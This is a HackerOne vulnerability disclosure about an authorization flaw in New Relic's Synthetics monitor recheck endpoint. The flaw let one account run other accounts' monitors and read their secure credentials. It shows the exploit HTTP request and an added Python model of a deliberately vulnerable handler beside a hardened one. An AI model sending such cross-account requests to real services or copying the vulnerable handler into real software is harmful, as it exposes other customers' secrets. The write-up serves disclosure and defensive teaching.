New Relic: Ability to run monitors' jobs of other accounts and to read these jobs content (including the secure credentials values)

ID H1:787886
Type hackerone
Reporter skavans
Modified 2020-08-13T13:45:22


@skavans identified an endpoint for re-running (rechecking) Synthetics monitors. The endpoint did not validate that the monitor referenced by `monitorId` belonged to the account named in the request, so anyone who knew another account's monitor ID could trigger that monitor's job from their own account and read the job's content, including the values of the secure credentials the monitor uses:

```
POST /accounts/<ACCOUNT ID>/monitors/monitor/recheck.json?monitorId=<MONITOR_ID> HTTP/1.1
Host: ...

{"monitorId":"<MONITOR_ID>","location":"AWS_AP_SOUTHEAST_1","accountId":<ACCOUNT ID>}
```
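The missing check is an object-level authorization check (an IDOR): the handler verifies that the caller may act on the account in the URL, but never verifies that the monitor it then loads belongs to that account. The following is an added illustration written for this page, not New Relic's code; the in-memory monitor store, account numbers, monitor IDs and handler signatures are all constructed, and the vulnerable handler is one plausible way the reported behaviour arises rather than a description of the real implementation. It shows the vulnerable handler next to a hardened one that ties the monitor to the account being acted on:

```python
"""Hypothetical model of the recheck endpoint's authorization logic.

Added example, not New Relic's code. All data below is constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Monitor:
    monitor_id: str
    account_id: int
    script: str  # what a job run exposes: the script and the secure credentials it resolves


# Constructed sample data: two accounts, one monitor each.
MONITORS = {
    "mon-aaaa": Monitor("mon-aaaa", 1001, "script of account 1001 using $secure.API_KEY=apikey-1001"),
    "mon-bbbb": Monitor("mon-bbbb", 2002, "script of account 2002 using $secure.DB_PASSWORD=dbpass-2002"),
}


class Forbidden(Exception):
    """Raised when a request fails authorization."""


def run_job(monitor: Monitor, location: str) -> str:
    """Stand-in for dispatching a Synthetics job; returns the job output."""
    return f"ran {monitor.monitor_id} from {location}: {monitor.script}"


def recheck_vulnerable(caller_account: int, path_account: int, body: dict) -> str:
    """Mirrors the reported flaw (as assumed here): only the path account is
    authorized; body['monitorId'] is loaded with no ownership check."""
    if caller_account != path_account:
        raise Forbidden("caller does not own the account in the path")
    monitor = MONITORS[body["monitorId"]]  # any monitor ID in the system is accepted
    return run_job(monitor, body.get("location", "UNKNOWN"))


def recheck_fixed(caller_account: int, path_account: int, body: dict) -> str:
    """Hardened handler: the monitor must belong to the account being acted on,
    and a body accountId that disagrees with the path is rejected."""
    if caller_account != path_account:
        raise Forbidden("caller does not own the account in the path")
    if body.get("accountId", path_account) != path_account:
        raise Forbidden("body accountId does not match the path account")
    monitor = MONITORS.get(body.get("monitorId"))
    # Treat "not found" and "not yours" identically so the endpoint cannot be
    # used as an oracle for guessing other accounts' monitor IDs.
    if monitor is None or monitor.account_id != path_account:
        raise Forbidden("monitor not found in this account")
    return run_job(monitor, body.get("location", "UNKNOWN"))


def try_recheck(handler, caller_account: int, path_account: int, body: dict) -> str:
    """Run a handler and collapse authorization failures to the string 'FORBIDDEN',
    so the outcome of each scenario is a single comparable value."""
    try:
        return handler(caller_account, path_account, body)
    except Forbidden:
        return "FORBIDDEN"


if __name__ == "__main__":
    # Account 1001 requests a recheck of account 2002's monitor via its own account path.
    cross = {"monitorId": "mon-bbbb", "location": "AWS_AP_SOUTHEAST_1", "accountId": 1001}
    print("vulnerable:", try_recheck(recheck_vulnerable, 1001, 1001, cross))
    print("fixed:     ", try_recheck(recheck_fixed, 1001, 1001, cross))
```

With the vulnerable handler the cross-account request runs account 2002's monitor and returns its output, secure credential value included; the hardened handler refuses it while still serving account 1001's own monitor. The check that matters is the comparison of the loaded monitor's owner against the account in the path; checking the caller against the path alone is not enough because the monitor ID is the attacker-controlled parameter.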